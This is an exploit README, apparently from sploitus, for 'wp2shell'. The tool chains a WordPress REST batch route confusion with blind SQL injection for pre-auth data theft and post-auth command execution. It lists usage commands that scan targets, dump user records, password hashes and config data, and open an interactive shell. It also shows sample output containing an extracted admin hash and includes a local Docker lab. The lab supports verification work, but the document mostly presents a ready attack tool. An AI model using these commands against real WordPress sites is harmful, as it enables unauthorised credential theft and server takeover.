Share
## https://sploitus.com/exploit?id=51C7D9F6-05E2-59F7-A602-3BD17495AF1C
# wp2shell โ CVE-2026-63030 + CVE-2026-60137
WordPress Pre-Auth RCE via REST Batch Route Confusion + WP_Query SQL Injection.
**Author:** dinhvaren | **Research:** Adam Kues / Searchlight Cyber
## Affected Versions
| Branch | Affected | Fixed |
|--------|----------|-------|
| 6.8.x | 6.8.0 โ 6.8.5 | **6.8.6** |
| 6.9.x | 6.9.0 โ 6.9.4 | **6.9.5** |
| 7.0.x | 7.0.0 โ 7.0.1 | **7.0.2** |
---
## Tool: `poc/wp2shell.py`
### Commands
```bash
# Scan โ detect version + route confusion + blind SQLi
python3 wp2shell.py -t scan
python3 wp2shell.py -t scan -o report.json
python3 wp2shell.py -t scan --sleep 2 --rounds 5
python3 wp2shell.py -t -d scan # debug mode
# Read โ extract data via pre-auth blind SQLi
python3 wp2shell.py -t read --preset fingerprint
python3 wp2shell.py -t read --preset users
python3 wp2shell.py -t read --preset config
python3 wp2shell.py -t read --query "SELECT VERSION()"
python3 wp2shell.py -t read --preset users -o users.csv
# Shell โ post-auth RCE (requires admin credentials)
python3 wp2shell.py -t shell -u admin -p -c id
python3 wp2shell.py -t shell -u admin -p # interactive
```
### Flags
| Flag | Description |
|------|-------------|
| `-t, --target` | WordPress URL |
| `-o, --output` | Export results (`.json` / `.csv`) |
| `-d, --debug` | Show raw HTTP requests & responses |
| `--sleep` | SLEEP seconds for SQLi timing (default: 3) |
| `--rounds` | Timing rounds for scan (default: 3) |
| `--timeout` | HTTP timeout seconds (default: 30) |
| `--proxy` | HTTP proxy |
| `--ua` | Custom User-Agent |
### Scan Output (vulnerable)
```
[*] WordPress 7.0.1 detected via HTML meta generator
[-] VERSION IN AFFECTED RANGE
[+] Route confusion CONFIRMED (parse_path_failed, block_cannot_read, rest_batch_not_allowed)
[+] BLIND SQL INJECTION CONFIRMED (delta=2.0s)
[!!!] VULNERABLE โ wp2shell chain confirmed
```
### Read Output (pre-auth data extraction)
```
[+] db_version: 8.0.46
[+] db_user: wordpress@%
[+] db_name: wordpress
[+] hostname: mysql-vulnerable
[+] [1] admin
Email : admin@localhost.local
Hash : $wp$2y$10$Y3mTlnQb4oziMW8S5wkD/e5lqBnR0rs9DhdKT9D0ZYQ3OMuBVwQ/y
Roles : administrator
```
---
## Docker Lab
Local lab to **verify the exploit and test the tool** before scanning real targets.
### Purpose
- **Vulnerable** instance (7.0.1) โ confirms the tool detects correctly
- **Fixed** instance (7.0.2) โ confirms the tool reports SAFE
- Side-by-side demo: same tool, same request โ old version vulnerable, new version not
### Endpoints
| Instance | URL | Version |
|----------|-----|---------|
| Vulnerable | http://127.0.0.1:8081 | WordPress 7.0.1 |
| Fixed | http://127.0.0.1:8082 | WordPress 7.0.2 |
### Quick Start
```powershell
cd lab
# Build & start
docker compose up -d
# Install WordPress on both
docker exec wp2shell-vulnerable wp --allow-root core install --url="http://127.0.0.1:8081" --title="wp2shell Vuln 7.0.1" --admin_user=admin --admin_password="wp2shell-local-lab" --admin_email=a@a.a --skip-email
docker exec wp2shell-fixed wp --allow-root core install --url="http://127.0.0.1:8082" --title="wp2shell Fixed 7.0.2" --admin_user=admin --admin_password="wp2shell-local-lab" --admin_email=a@a.a --skip-email
# Add .htaccess (see lab/README.md for full setup)
# Verify
cd ../poc
python3 wp2shell.py -t http://127.0.0.1:8081 scan # โ VULNERABLE
python3 wp2shell.py -t http://127.0.0.1:8082 scan # โ SAFE
```
### Management
```powershell
docker compose stop # Stop (keep data)
docker compose start # Start again
docker compose down -v # Full reset
```
### Credentials (local lab only)
```
Admin : admin / wp2shell-local-lab
MySQL : root / wp2shell_root_local_only
```
---
## Project Structure
```
wp2shell/
โโโ README.md โ This file
โโโ analysis/
โ โโโ root-cause.md โ Root cause + vulnerable vs fixed code
โ โโโ chain.md โ Attack chain step-by-step
โ โโโ diff.md โ Patch diff 7.0.1 โ 7.0.2
โ โโโ poc.md โ Tool internals
โโโ lab/
โ โโโ README.md โ Full lab setup guide
โ โโโ docker-compose.yml
โ โโโ Dockerfile
โโโ poc/
โโโ wp2shell.py โ Main tool
```